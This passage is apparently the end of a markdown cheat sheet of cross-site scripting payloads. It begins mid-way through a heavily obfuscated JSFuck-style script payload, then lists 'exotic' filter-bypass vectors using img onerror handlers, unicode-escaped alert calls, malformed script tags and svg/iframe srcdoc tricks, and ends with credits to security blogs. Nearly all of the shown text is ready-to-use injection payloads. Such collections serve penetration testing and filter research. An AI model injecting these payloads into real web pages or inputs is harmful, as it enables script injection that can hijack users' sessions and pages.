[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()</script>
|
||
```
|
||
|
||
|
||
|
||
|
||
Exotic payloads
|
||
```
|
||
<img src=1 alt=al lang=ert onerror=top[alt+lang](0)>
|
||
<script>$=1,alert($)</script>
|
||
<script ~~~>confirm(1)</script ~~~>
|
||
<script>$=1,\u0061lert($)</script>
|
||
<</script/script><script>eval('\\u'+'0061'+'lert(1)')//</script>
|
||
<</script/script><script ~~~>\u0061lert(1)</script ~~~>
|
||
</style></scRipt><scRipt>alert(1)</scRipt>
|
||
<img/id="alert('XSS')\"/alt=\"/\"src=\"/\"onerror=eval(id)>
|
||
<img src=x:prompt(eval(alt)) onerror=eval(src) alt=String.fromCharCode(88,83,83)>
|
||
<svg><x><script>alert('1')</x>
|
||
<iframe src=""/srcdoc='<svg onload=alert(1)>'>
|
||
```
|
||
|
||
|
||
## Thanks to
|
||
* https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot
|
||
* tbm
|
||
* http://infinite8security.blogspot.com/2016/02/welcome-readers-as-i-promised-this-post.html
|
||
* http://www.thespanner.co.uk/2014/03/21/rpo/
|
||
* http://blog.innerht.ml/rpo-gadgets/
|
||
* http://support.detectify.com/customer/portal/articles/2088351-relative-path-overwrite
|
||
* http://d3adend.org/xss/ghettoBypass
|
||
* http://blog.portswigger.net/2016/01/xss-without-html-client-side-template.html
|
||
* http://blog.rakeshmane.com/2017/08/xssing-web-part-2.html
|